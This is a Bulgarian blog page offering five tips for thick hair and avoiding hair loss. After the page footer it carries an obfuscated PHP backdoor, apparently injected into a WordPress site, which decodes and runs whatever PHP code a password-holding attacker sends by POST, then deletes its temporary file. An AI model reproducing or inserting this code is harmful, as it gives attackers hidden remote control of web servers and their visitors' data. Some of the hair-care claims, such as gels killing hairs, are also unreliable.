5 съвета за гъста коса | Косопад

5 стъпки за гъста и красива коса

Как да запазим косата си гъста и да избегнем косопад

съвети за гъста коса

5 съвета за гъста коса

Ако някога сте страдали от косопад за вас е повече от ясно, че поддържането на гъста и красива коса съвсем не е толкова лесна задача. Изискват се непрекъснати грижи и голямо старание, а това важи с пълна сила за представителките на нежния пол. Предлагаме ви пет безценни съвета, които ще ви помогнат да запазите самочувствието си на желана и красива жена.

Поддържайте косата си правилно

За да се спасите от косопад, никога не прекалявайте с каквото и да било. Състоянието на косата е огледално отражение на общата кондиция на тялото и това значи, че ако разсипвате организма си с вреден начин на живот, то ще разсипете и косата си. Бъдете внимателни с храната, с излагането на голяма горещина или студ, с провеждането на тежки диети за отслабване.

Не прекалявайте с шампоана

Въпреки че шампоаните почистват главата, те също така почистват и естествения защитен слой на скалпа. Това повишава в пъти рисковете от поява на косопад и поради това намалете употребата на подобни козметични продукти до минимум. Добре е след всяко измиване с шампоан да правите подхранваща маска, която ще неутрализира вредното влияние на химическите продукти. (вижте секция рецепти при косопад)

Забравете за лака за коса и гела

Знаете ли, че лакът за коса и стоп – геловете са изключително вредни за косата? Тези изкуствени продукти изтощават и понякога убиват космите, създавайки огромни предпоставки за поява на косопад. Използвайте ги само в крайна нужда, когато наистина трябва да изглеждате блестящо.

Изхвърлете сешоара

Изсушаването на косата със сешоар е един от най – вредните навици, които мъчат модерното общество. Ако от години наред процедирате с горещата струя след къпане отначало ще ви бъде малко трудно да отвикнете, но после ще забележите колко по – приятно е като цяло косата да изсъхне сама.

Не пушете

Това навярно е най – трудният от тези пет съвета против косопад. Направете всичко възможно за изкореняване на този вреден навик не само заради косата си, а и заради цялостното си здравословно състояние.

5 съвета за гъста коса

5 съвета за гъста коса

04. май 2013 17:28:33 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}